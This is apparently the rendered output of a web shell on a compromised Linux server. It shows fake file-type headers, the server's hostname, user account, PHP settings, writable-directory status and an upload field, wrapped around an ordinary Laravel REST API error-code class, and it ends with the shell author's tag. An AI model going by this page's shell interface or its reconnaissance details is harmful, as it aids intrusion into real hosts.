%PDF- %GIF98; %PNG; .
Cyber Programmer
Logo of a company Server : Apache
System : Linux host.digitalbabaji.in 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64
User : addictionfreeind ( 1003)
PHP Version : 7.2.34
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/addictionfreeind/www/admin1/vendor/froiden/laravel-rest-api/src/Exceptions/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/addictionfreeind/www/admin1/vendor/froiden/laravel-rest-api/src/Exceptions/ErrorCodes.php
<?php

namespace Froiden\RestAPI\Exceptions;

class ErrorCodes
{
    const REQUEST_PARSE_EXCEPTION = 100;
    const UNKNOWN_EXCEPTION  = 1;
    const UNAUTHENTICATION_EXCEPTION = 401;
    const UNAUTHORIZED_EXCEPTION = 403;
    const VALIDATION_EXCEPTION = 422;
    const RESOURCE_NOT_FOUND_EXCEPTION = 404;

    const INNER_FILTER_NOT_FOUND = 1001;
    const INNER_INVALID_FILTER_DEFINITION = 1002;
    const INNER_UNKNOWN_FILED_EXCEPTION = 1003;
    const INNER_NOT_ALLOWED_TO_FILTER_ON_THIS_FIELD = 1004;
    const INNER_ORDERING_INVALID = 1005;
    const INNER_MAX_LIMIT = 1006;
    const INNER_INVALID_LIMIT = 1007;

    const INNER_RELATED_RESOURCE_NOT_EXISTS = 1010;
}

VaKeR 2022